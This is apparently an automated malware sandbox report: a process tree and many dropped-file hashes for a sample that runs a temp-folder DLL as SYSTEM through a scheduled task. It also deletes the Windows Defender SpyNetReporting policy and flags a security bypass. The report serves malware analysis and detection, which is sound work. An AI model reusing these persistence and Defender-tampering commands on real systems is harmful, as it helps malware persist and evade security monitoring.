C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BTdQtQCLlbasEjBtK" /SC once /ST 02:44:04 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\SVXwGszHTIpIGNNH\leAXVdPw\ArKHLfh.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1488
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "BTdQtQCLlbasEjBtK"3⤵PID:984
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:380
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:900
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1204
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GyQsokuHCPHrPIKjm"3⤵PID:1004
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\SVXwGszHTIpIGNNH\leAXVdPw\ArKHLfh.dll",#1 /site_id 5254032⤵PID:976
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\SVXwGszHTIpIGNNH\leAXVdPw\ArKHLfh.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:760 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BTdQtQCLlbasEjBtK"4⤵PID:1056
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1128
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2012
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "8476951841201868027-667885944730630216-1138518299-1642282438-1052134035-1033497529"1⤵
- Windows security bypass
PID:272
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1627572156-10915375411472808906-189319586-5711303146640846181942271070-1221973363"1⤵
- Windows security bypass
PID:1732
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1172
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD517ce0893b5d832aeb9d1b80e6b289746
SHA10f136e2ced58c875de07bec21f395e79bcd533d8
SHA2569748d40eed77c85741be41db61afbe2be697c67abac96ee480268b37519268e4
SHA512d571bd58a1d6a11b6437a54a31d3937ff4ed0b4beaebce4fac20156dc2d3e1c9357ca6d9ab2c0f1c6756344fe39d6ee85e141a47f1cdb5bd0065fd3ff5aca9dd
-
Filesize
2KB
MD5371e5e9ed0206ef8dacb351cfa1c1f4d
SHA1c59b254ee554f1ef976f1ec917f03b316da33ec9
SHA256d6a89061fc21cf308e57be89ea3f615bfa9d02d7c21e351215b03d88b8441a7c
SHA512a4e040f8d78a1a4fc43e584cb13b5bb4c9b4ebd53fb3b8fd3267e3d4a9b69572d53700d278ee305b1536eb4f200c60275c61f41d51517e684b434428f8aaec30
-
Filesize
2KB
MD51f4ef3c74aa2d36b225cdaeb22650ff3
SHA166716f104821027d64b4f112d420add79b7e979a
SHA25681f30b0c4ba6e4eafb063f406db08f97887938c88b647f814f12ea6dba05ab93
SHA5124376abe6371ecd53a1fc3c7334c76af56107f827176174854dfb77db65106bf5946512dbe754d90224b41a1af45cc6c1a0d43b2b53a2c9237c27a51b673254b7
-
Filesize
2KB
MD5de6ef550a71bb5afa91749f2f3c6e324
SHA17b4bf7a1ea1f500a6097e7f5c2237e848335a001
SHA25634821539b8321474e0c0576752248eb0ba6cb95b19e372916f35b7fc140e760d
SHA51272787017b1b61011cf8e051dd8950e7b9702e5fb1deabbbefb919abafb31f5b05b0b3d2162619d4e86ca42af496dab46317d01d2ae399c2f1e9adf04c4f7579f
-
Filesize
2KB
MD56a9c9271cbbe1031a13f39d037e72dd0
SHA11f179ae71efe375036ea4831fe8a353e1ef87bc0
SHA256b6ff13871ce7789cac394dbd56118bf677d72b627ba99b59b822df839c097239
SHA5121295e38ffb1e62e9d42ecc05f6f0ead05879aafe3c4c8d94277549d19425b1e2ebb8fc512658dc27da54b66c4bf91c8e2d0775eb6ec304cd8268968954690de7
-
Filesize
6.3MB
MD5956bc0c71acaea9f492b15ef406dbf7d
SHA1431719b51c898403d8d1ea7373d3f53ebbc92c43
SHA2560e3819e39be17b00ac68ece7896ca4969a38f7cac283cf77346cca3e1861cb3c
SHA5127b5fe6ab5a40100928c6e01a5e57ce0d45e03fbcfbaa246caaa8a55d29c34b468fd47d46425dc3853373d21ebf0d8975142fedc366bedd40d1753d671aeb2992
-
Filesize
6.3MB
MD5956bc0c71acaea9f492b15ef406dbf7d
SHA1431719b51c898403d8d1ea7373d3f53ebbc92c43
SHA2560e3819e39be17b00ac68ece7896ca4969a38f7cac283cf77346cca3e1861cb3c
SHA5127b5fe6ab5a40100928c6e01a5e57ce0d45e03fbcfbaa246caaa8a55d29c34b468fd47d46425dc3853373d21ebf0d8975142fedc366bedd40d1753d671aeb2992
-
Filesize
6.8MB
MD596443d2ed3dac1e29958751a3f4f0487
SHA1d20bf0ff83e4c9383f1a20bf564548eed8d5b706
SHA256c8de7ad6edd61baaf04e043c78776d51e84fc91600e566d589059a8dc8d2f35a
SHA512b8cbc648156591878af5fcb1d77cbeeb7ee4bc40fc52895f87f95ca2c655bbded948159d96395669a259e87a74a1df2f8a0ba5dc14dc7e5c3c54a0dd2b3469b2
-
Filesize
6.8MB
MD596443d2ed3dac1e29958751a3f4f0487
SHA1d20bf0ff83e4c9383f1a20bf564548eed8d5b706
SHA256c8de7ad6edd61baaf04e043c78776d51e84fc91600e566d589059a8dc8d2f35a
SHA512b8cbc648156591878af5fcb1d77cbeeb7ee4bc40fc52895f87f95ca2c655bbded948159d96395669a259e87a74a1df2f8a0ba5dc14dc7e5c3c54a0dd2b3469b2
-
Filesize
6.8MB
MD596443d2ed3dac1e29958751a3f4f0487
SHA1d20bf0ff83e4c9383f1a20bf564548eed8d5b706
SHA256c8de7ad6edd61baaf04e043c78776d51e84fc91600e566d589059a8dc8d2f35a
SHA512b8cbc648156591878af5fcb1d77cbeeb7ee4bc40fc52895f87f95ca2c655bbded948159d96395669a259e87a74a1df2f8a0ba5dc14dc7e5c3c54a0dd2b3469b2
-
Filesize
6.8MB
MD596443d2ed3dac1e29958751a3f4f0487
SHA1d20bf0ff83e4c9383f1a20bf564548eed8d5b706
SHA256c8de7ad6edd61baaf04e043c78776d51e84fc91600e566d589059a8dc8d2f35a
SHA512b8cbc648156591878af5fcb1d77cbeeb7ee4bc40fc52895f87f95ca2c655bbded948159d96395669a259e87a74a1df2f8a0ba5dc14dc7e5c3c54a0dd2b3469b2
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5dd623768d7cf7d817dd22ace9f8ea042
SHA1c767eb2e5bc625a695135fd39fbf6825a86d8e1a
SHA2560745577512ffa7d38450e6f63a5769fc24df3ecc47c6c27d0bd231d7c0c1b2f7
SHA512fa06b0afb85cb1590458a439b5b706203edb31968a9103b3720d61744dd531dca7f9ba0c240d526ca313e03fbb342e5a95dea805d5770e6ea2524d3d89f14050
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD574e82b21021f1dc066cd0fa169fd4162
SHA10d87ce35c790aad4a79897b8611b323da7368c4f
SHA2568c1bbd902f6506e4fd80b9db677e6f95bca9eea1056846e9a5809f462a5ec476
SHA5128b48a2e80e406c9cfdc4f87aa56f1426a0650a532fc88e3e7f6ad4d8092eaa880d76ec2c426781a3d47847e5eebacc0c65e83a7941e20448967c5a76aa0a8d10
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5afdb6683fbad75e1853a171ed1ed15c3
SHA1fe2c46711082c7b98aa9bf435f153a543422f060
SHA256e58c46288117c07e5c78e5797bf4926cf5f34d75077853353d7ee01cfd25f17c
SHA5127748e5d1c8b8f47fd8b0de7efa498f320f1cc01c44e7649b0d83d54684d4c3f12cb2f44f12a3f6178cc4f2d92f9d605926fa6b7dbda17320e75df3b2f4fb945c
-
Filesize
6.8MB
MD596443d2ed3dac1e29958751a3f4f0487
SHA1d20bf0ff83e4c9383f1a20bf564548eed8d5b706
SHA256c8de7ad6edd61baaf04e043c78776d51e84fc91600e566d589059a8dc8d2f35a
SHA512b8cbc648156591878af5fcb1d77cbeeb7ee4bc40fc52895f87f95ca2c655bbded948159d96395669a259e87a74a1df2f8a0ba5dc14dc7e5c3c54a0dd2b3469b2
-
Filesize
6.8MB
MD596443d2ed3dac1e29958751a3f4f0487
SHA1d20bf0ff83e4c9383f1a20bf564548eed8d5b706
SHA256c8de7ad6edd61baaf04e043c78776d51e84fc91600e566d589059a8dc8d2f35a
SHA512b8cbc648156591878af5fcb1d77cbeeb7ee4bc40fc52895f87f95ca2c655bbded948159d96395669a259e87a74a1df2f8a0ba5dc14dc7e5c3c54a0dd2b3469b2
-
Filesize
6.2MB
MD5a2d451ef2286310487f54180030fe3d7
SHA10fc544155cccadd622983805e504183976862241
SHA256f9e91f830d7385fd6c1445dd5b09d865a1296eb7d6a076a152aa7dd642d5f69d
SHA51235aebacfea629f5d70e657370c57aec2b9a80e1460610a2697dd983711118a859f76158a9e9a19357d772a97f6a76fe7ade00ea6097481954bc2ef2ba1ea133c
-
Filesize
8KB
MD5f3d3aed0d28251960880f1af2ed7a9a2
SHA1a3968b5178bb4600c351cd3622946bbb5f2c2b1c
SHA256ed5046d2973b28e7ac565bf776fb66f02a00bc20baf77b12e212580b2712073d
SHA512c55ffdb1451cf2d3321bc393eae5ba25d3042cd7a7737d6c0323d6ef212a877d3cd975ff7d94688f16c957719c7bef1427e1462988fad215405658a1ceb15b0a
-
Filesize
5KB
MD5c08ca862600a895f056a9793c63ce8c4
SHA1c1663953c6a769a334df049f9261b1c93a7dc9d4
SHA256f38dd7a41ee55cb192533f61882d9a6e70c4c2c0b6ea1dfc40a89b8331c2f1a0
SHA512768acf32be3651a3a1e5d1387877a287845fe34cf8b8af54cf902f3a413f15e59e3fc7d08bde95d89e211a4db45bfad68828a60f7bcbd5623ce52db2a95760f5
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.3MB
MD5956bc0c71acaea9f492b15ef406dbf7d
SHA1431719b51c898403d8d1ea7373d3f53ebbc92c43
SHA2560e3819e39be17b00ac68ece7896ca4969a38f7cac283cf77346cca3e1861cb3c
SHA5127b5fe6ab5a40100928c6e01a5e57ce0d45e03fbcfbaa246caaa8a55d29c34b468fd47d46425dc3853373d21ebf0d8975142fedc366bedd40d1753d671aeb2992
-
Filesize
6.3MB
MD5956bc0c71acaea9f492b15ef406dbf7d
SHA1431719b51c898403d8d1ea7373d3f53ebbc92c43
SHA2560e3819e39be17b00ac68ece7896ca4969a38f7cac283cf77346cca3e1861cb3c
SHA5127b5fe6ab5a40100928c6e01a5e57ce0d45e03fbcfbaa246caaa8a55d29c34b468fd47d46425dc3853373d21ebf0d8975142fedc366bedd40d1753d671aeb2992
-
Filesize
6.3MB
MD5956bc0c71acaea9f492b15ef406dbf7d
SHA1431719b51c898403d8d1ea7373d3f53ebbc92c43
SHA2560e3819e39be17b00ac68ece7896ca4969a38f7cac283cf77346cca3e1861cb3c
SHA5127b5fe6ab5a40100928c6e01a5e57ce0d45e03fbcfbaa246caaa8a55d29c34b468fd47d46425dc3853373d21ebf0d8975142fedc366bedd40d1753d671aeb2992
-
Filesize
6.3MB
MD5956bc0c71acaea9f492b15ef406dbf7d
SHA1431719b51c898403d8d1ea7373d3f53ebbc92c43
SHA2560e3819e39be17b00ac68ece7896ca4969a38f7cac283cf77346cca3e1861cb3c
SHA5127b5fe6ab5a40100928c6e01a5e57ce0d45e03fbcfbaa246caaa8a55d29c34b468fd47d46425dc3853373d21ebf0d8975142fedc366bedd40d1753d671aeb2992
-
Filesize
6.8MB
MD596443d2ed3dac1e29958751a3f4f0487
SHA1d20bf0ff83e4c9383f1a20bf564548eed8d5b706
SHA256c8de7ad6edd61baaf04e043c78776d51e84fc91600e566d589059a8dc8d2f35a
SHA512b8cbc648156591878af5fcb1d77cbeeb7ee4bc40fc52895f87f95ca2c655bbded948159d96395669a259e87a74a1df2f8a0ba5dc14dc7e5c3c54a0dd2b3469b2
-
Filesize
6.8MB
MD596443d2ed3dac1e29958751a3f4f0487
SHA1d20bf0ff83e4c9383f1a20bf564548eed8d5b706
SHA256c8de7ad6edd61baaf04e043c78776d51e84fc91600e566d589059a8dc8d2f35a
SHA512b8cbc648156591878af5fcb1d77cbeeb7ee4bc40fc52895f87f95ca2c655bbded948159d96395669a259e87a74a1df2f8a0ba5dc14dc7e5c3c54a0dd2b3469b2
-
Filesize
6.8MB
MD596443d2ed3dac1e29958751a3f4f0487
SHA1d20bf0ff83e4c9383f1a20bf564548eed8d5b706
SHA256c8de7ad6edd61baaf04e043c78776d51e84fc91600e566d589059a8dc8d2f35a
SHA512b8cbc648156591878af5fcb1d77cbeeb7ee4bc40fc52895f87f95ca2c655bbded948159d96395669a259e87a74a1df2f8a0ba5dc14dc7e5c3c54a0dd2b3469b2
-
Filesize
6.8MB
MD596443d2ed3dac1e29958751a3f4f0487
SHA1d20bf0ff83e4c9383f1a20bf564548eed8d5b706
SHA256c8de7ad6edd61baaf04e043c78776d51e84fc91600e566d589059a8dc8d2f35a
SHA512b8cbc648156591878af5fcb1d77cbeeb7ee4bc40fc52895f87f95ca2c655bbded948159d96395669a259e87a74a1df2f8a0ba5dc14dc7e5c3c54a0dd2b3469b2
-
Filesize
6.2MB
MD5a2d451ef2286310487f54180030fe3d7
SHA10fc544155cccadd622983805e504183976862241
SHA256f9e91f830d7385fd6c1445dd5b09d865a1296eb7d6a076a152aa7dd642d5f69d
SHA51235aebacfea629f5d70e657370c57aec2b9a80e1460610a2697dd983711118a859f76158a9e9a19357d772a97f6a76fe7ade00ea6097481954bc2ef2ba1ea133c
-
Filesize
6.2MB
MD5a2d451ef2286310487f54180030fe3d7
SHA10fc544155cccadd622983805e504183976862241
SHA256f9e91f830d7385fd6c1445dd5b09d865a1296eb7d6a076a152aa7dd642d5f69d
SHA51235aebacfea629f5d70e657370c57aec2b9a80e1460610a2697dd983711118a859f76158a9e9a19357d772a97f6a76fe7ade00ea6097481954bc2ef2ba1ea133c
-
Filesize
6.2MB
MD5a2d451ef2286310487f54180030fe3d7
SHA10fc544155cccadd622983805e504183976862241
SHA256f9e91f830d7385fd6c1445dd5b09d865a1296eb7d6a076a152aa7dd642d5f69d
SHA51235aebacfea629f5d70e657370c57aec2b9a80e1460610a2697dd983711118a859f76158a9e9a19357d772a97f6a76fe7ade00ea6097481954bc2ef2ba1ea133c
-
Filesize
6.2MB
MD5a2d451ef2286310487f54180030fe3d7
SHA10fc544155cccadd622983805e504183976862241
SHA256f9e91f830d7385fd6c1445dd5b09d865a1296eb7d6a076a152aa7dd642d5f69d
SHA51235aebacfea629f5d70e657370c57aec2b9a80e1460610a2697dd983711118a859f76158a9e9a19357d772a97f6a76fe7ade00ea6097481954bc2ef2ba1ea133c